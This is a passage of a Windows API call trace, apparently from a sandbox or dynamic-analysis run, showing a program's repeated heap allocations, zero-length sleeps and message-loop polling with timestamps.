0xef1960 [0263.840] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.840] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.841] Sleep (dwMilliseconds=0x0) [0263.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.841] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.841] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.841] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.841] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.841] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.841] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.841] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.841] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.841] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.841] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.841] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.841] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.841] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.841] Sleep (dwMilliseconds=0x0) [0263.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.842] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.842] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.842] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.842] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.842] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.842] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.842] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.842] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.842] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.842] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.842] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.842] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.842] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.842] Sleep (dwMilliseconds=0x0) [0263.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.842] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.843] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.843] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.843] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.843] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.843] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.843] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.843] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.843] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.843] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.843] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.843] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.843] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.843] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.843] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.843] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.843] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.843] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.843] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.843] Sleep (dwMilliseconds=0x0) [0263.843] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.843] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.843] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.843] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.843] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.843] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.843] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.844] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.844] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.844] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.844] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.844] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.844] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.852] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.852] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0263.852] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91fd04) returned 0 [0263.852] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 0 [0263.852] TranslateMessage (lpMsg=0x91fd04) returned 0 [0263.852] DispatchMessageW (lpMsg=0x91fd04) returned 0x0 [0263.852] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.852] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.852] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.852] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.852] Sleep (dwMilliseconds=0x0) [0263.852] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.852] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.852] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.852] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.852] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.852] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.853] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.853] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.853] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.853] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.853] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.853] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.853] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.853] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.853] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.853] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.853] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.853] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.853] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.853] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.853] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.853] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.853] Sleep (dwMilliseconds=0x0) [0263.853] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.853] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.853] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.853] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.853] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.853] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.853] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.853] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.853] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.854] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.854] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.854] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.854] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.854] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.854] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.854] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.854] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.854] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.854] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.854] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.854] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.854] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.854] Sleep (dwMilliseconds=0x0) [0263.854] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.854] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.854] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.854] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.854] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.854] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.854] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.854] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.854] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.854] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.854] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.855] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.855] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.855] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.855] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.855] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.855] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.855] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.855] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.855] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.855] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.855] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.855] Sleep (dwMilliseconds=0x0) [0263.855] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.855] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.855] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.855] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.855] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.855] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.855] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.855] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.855] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.855] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.855] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.855] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.856] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.856] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.856] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.856] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.856] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.856] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.856] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.856] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.856] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.856] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.856] Sleep (dwMilliseconds=0x0) [0263.856] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.856] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.856] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.856] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.856] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.856] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.856] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.856] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.856] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.856] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.856] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.856] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.856] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.857] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.857] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.857] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.857] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.857] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.857] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.857] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.857] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.857] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.857] Sleep (dwMilliseconds=0x0) [0263.857] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.857] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.857] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.857] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.857] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.857] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.857] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.857] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.857] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.857] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.857] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.857] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.857] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.857] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.858] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.858] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 